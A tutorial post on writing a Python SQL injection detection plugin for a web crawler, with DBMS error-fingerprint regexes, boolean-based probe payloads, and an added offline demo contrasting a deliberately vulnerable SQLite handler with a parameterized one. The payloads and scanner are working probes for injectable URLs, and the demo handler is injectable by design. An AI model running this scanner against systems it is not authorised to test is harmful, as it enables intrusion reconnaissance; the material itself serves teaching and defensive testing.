• Web crawler + SQL injection detection, part 1


    Project directory structure

    /w8ay.py            // main entry point of the project
    /lib/core           // directory for the core files
    /lib/core/config.py // configuration file
    /script             // plugins
    /exp                // exploits and PoCs

    4. Experiment steps
    4.1 Writing the SQL detection script

    Store the database fingerprints in a dictionary:

    DBMS_ERRORS = {  # regular expressions used for DBMS recognition based on error message response
        "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
        "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
        "Microsoft SQL Server": (r"Driver.* SQL[-\_ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
        "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
        "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
        "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
        "SQLite": (r"SQLite/JDBCDriver", r"SQLite\.Exception", r"System\.Data\.SQLite\.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
        "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
    }

    If one of these regular expressions matches the response, we know which database is behind the page.

    # Walk every (dbms, regex) pair and stop at the first error message that matches
    for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
        if re.search(regex, _content):
            return True

    These are our test statements (payloads):

    BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")

    Using these statements, fetch the page for a true condition and the page for a false condition, and compare them:

    for test_payload in BOOLEAN_TESTS:
        RANDINT = random.randint(1, 255)
        # page for the true condition (e.g. AND 7=7)
        _url = url + test_payload % (RANDINT, RANDINT)
        content["true"] = Downloader.get(_url)
        # page for the false condition (e.g. AND 7=8)
        _url = url + test_payload % (RANDINT, RANDINT + 1)
        content["false"] = Downloader.get(_url)
        if content["origin"] == content["true"] != content["false"]:
            return "sql found: %s" % url

    This line:

    content["origin"] == content["true"] != content["false"]

    means: when the original page equals the true-condition page and differs from the false-condition page, we can conclude that the URL has an injection vulnerability.

    Full code:

    import re, random
    from lib.core import Download

    def sqlcheck(url):
        # Only URLs that carry a query string are worth testing
        if url.find("?") == -1:
            return False
        Downloader = Download.Downloader()
        BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")
        DBMS_ERRORS = {  # regular expressions used for DBMS recognition based on error message response
            "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
            "PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
            "Microsoft SQL Server": (r"Driver.* SQL[-\_ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*", r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.", r"(?s)Exception.*\WRoadhouse\.Cms\."),
            "Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
            "Oracle": (r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
            "IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
            "SQLite": (r"SQLite/JDBCDriver", r"SQLite\.Exception", r"System\.Data\.SQLite\.SQLiteException", r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
            "Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
        }
        # Error-based check: append )("' (URL-encoded) to break the SQL syntax and look for a DBMS error message
        _url = url + "%29%28%22%27"
        _content = Downloader.get(_url)
        for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
            if re.search(regex, _content):
                return True
        # Boolean-based check: compare the untouched page with a true-condition and a false-condition page
        content = {}
        content["origin"] = Downloader.get(url)  # the original URL, not the error probe
        for test_payload in BOOLEAN_TESTS:
            RANDINT = random.randint(1, 255)
            _url = url + test_payload % (RANDINT, RANDINT)
            content["true"] = Downloader.get(_url)
            _url = url + test_payload % (RANDINT, RANDINT + 1)
            content["false"] = Downloader.get(_url)
            if content["origin"] == content["true"] != content["false"]:
                return "sql found: %s" % url
        return False

    Create this file in the /script directory and name it sqlcheck.py. For now we can call it on its own as a module; once the plugin system is written, the plugin system will call these modules automatically.

    Some URLs do not need testing, for example addresses ending in .html, and we can filter them out. Here I simply use find("?") to look for a ? and decide whether the URL meets our criteria.
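To show both heuristics end to end without a network, here is an added example (not code from the post or the w8ay project) that runs the error-based and boolean-based checks against two constructed handlers backed by an in-memory SQLite database: one that concatenates the parameter into the query, and one that binds it with a parameterized query. The handler names, the `leak_errors` switch and the PHP-style warning text are assumptions made for the demo.

```python
import random
import re
import sqlite3

# Constructed in-memory database standing in for the crawled application's backend.
DB = sqlite3.connect(":memory:")
DB.execute("CREATE TABLE items (id INTEGER, name TEXT)")
DB.executemany("INSERT INTO items VALUES (?, ?)", [(1, "apple"), (2, "pear")])

def vulnerable_page(id_value, leak_errors=True):
    """Concatenates the parameter into SQL; optionally echoes the driver error PHP-style."""
    try:
        rows = DB.execute("SELECT name FROM items WHERE id = " + id_value).fetchall()
    except sqlite3.Error as e:
        return "Warning: SQLite3::query(): %s" % e if leak_errors else "items: []"
    return "items: %s" % rows

def hardened_page(id_value):
    """Parameterized query: the whole parameter is bound as a single value."""
    rows = DB.execute("SELECT name FROM items WHERE id = ?", (id_value,)).fetchall()
    return "items: %s" % rows

# Subset of the post's DBMS_ERRORS fingerprints (with the regex escapes restored).
DBMS_ERRORS = {
    "SQLite": (r"Warning.*sqlite_.*", r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
    "MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*"),
}
BOOLEAN_TESTS = (" AND %d=%d", " OR NOT (%d=%d)")

def sqlcheck(page, value):
    """Apply the post's two heuristics to `page`, a function of the parameter value."""
    # 1. Error-based: the same )("' probe as the post, then fingerprint the error message.
    content = page(value + ")(\"'")
    for dbms, regexes in DBMS_ERRORS.items():
        if any(re.search(rx, content) for rx in regexes):
            return "error-based (%s)" % dbms
    # 2. Boolean-based: origin == true-condition page != false-condition page.
    origin = page(value)
    for test in BOOLEAN_TESTS:
        n = random.randint(1, 255)
        true_page = page(value + test % (n, n))
        false_page = page(value + test % (n, n + 1))
        if origin == true_page != false_page:
            return "boolean-based"
    return None

if __name__ == "__main__":
    print(sqlcheck(vulnerable_page, "1"))                                  # error-based (SQLite)
    print(sqlcheck(lambda v: vulnerable_page(v, leak_errors=False), "1"))  # boolean-based
    print(sqlcheck(hardened_page, "1"))                                    # None
```

The hardened handler is not flagged because the bound value "1 AND 7=7" is compared as a single string and never changes the query's logic, which is exactly why parameterized queries are the fix.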
  • Original article: https://www.cnblogs.com/jidongdeatao/p/8698772.html